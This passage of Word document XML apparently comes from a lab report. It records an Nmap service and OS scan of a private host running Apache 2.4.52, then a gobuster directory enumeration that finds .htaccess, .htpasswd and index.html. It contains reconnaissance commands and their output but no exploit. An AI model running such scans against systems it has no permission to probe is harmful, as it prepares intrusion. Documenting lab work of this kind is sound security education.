      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>( https://nmap.org</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) at 2022-11-19 15:12 EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56706ECE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>Nmap scan report for 10.0.5.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257B160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>Host is up (0.0018s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C6FDD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 xml:space="preserve">Not shown: 999 filtered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9C4FC5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>PORT   STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD1447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>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276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FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    Apache httpd 2.4.52 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFCE38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>|_http-server-header: Apache/2.4.52 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C71FCC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>|_http-title: Site doesn't have a title (text/html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BACB3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 xml:space="preserve">Warning: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OSScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD35D5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>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6E7F3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 xml:space="preserve">Running: Linux </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4.X|5.X</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65BD1843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 xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:/o:linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">:linux_kernel:4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:/o:linux:linux_kernel:5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258AB04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>OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA588C7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6F7D0957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>TRACEROUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC40A6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>HOP RTT     ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA8E576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 xml:space="preserve">1   1.80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.5.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077D2CF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5FDF1B1A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 xml:space="preserve">OS and Service detection performed. Please report any incorrect results at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://nmap.org/submit/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D1F8E5D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>Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F4619" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D"/>
    <w:p w14:paraId="01D568DE" w14:textId="6AC7A62F" w:rsidR="00BF382D" w:rsidRDefault="00FF276C" w:rsidP="00BF382D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Result of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDC9DF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>┌──(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>champuser</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0766625B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 xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189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814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189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814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e -u http://10.0.5.28/ -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7F793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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141BD48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814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> v3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32076F2A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 xml:space="preserve">by OJ Reeves (@TheColonial) &amp; Christian </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mehlmauer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@firefart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62406956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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15E23B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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Url:                     http://10.0.5.28/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94D10B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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Method:                  GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E246425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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Threads:                 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1522AE6B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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Wordlist:                /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A0394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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Negative Status codes:   404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB83442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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] User Agent:              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B9AC9C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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Expanded:                true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F8DFA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>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] Timeout:                 10s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2396773B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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68C9E1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 xml:space="preserve">2022/11/19 15:22:19 Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in directory enumeration mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515A676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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9FE205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 xml:space="preserve">http://10.0.5.28/.htaccess         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 403) [Size: 274]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEBC0C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>http://10.0.5.28/.hta              </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 403) [Size: 274]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470F738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 xml:space="preserve">http://10.0.5.28/.htpasswd         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 403) [Size: 274]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8F789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>http://10.0.5.28/index.html        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00814189">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Status: 200) [Size: 269]</w:t>
      </w:r>
    </w:p>
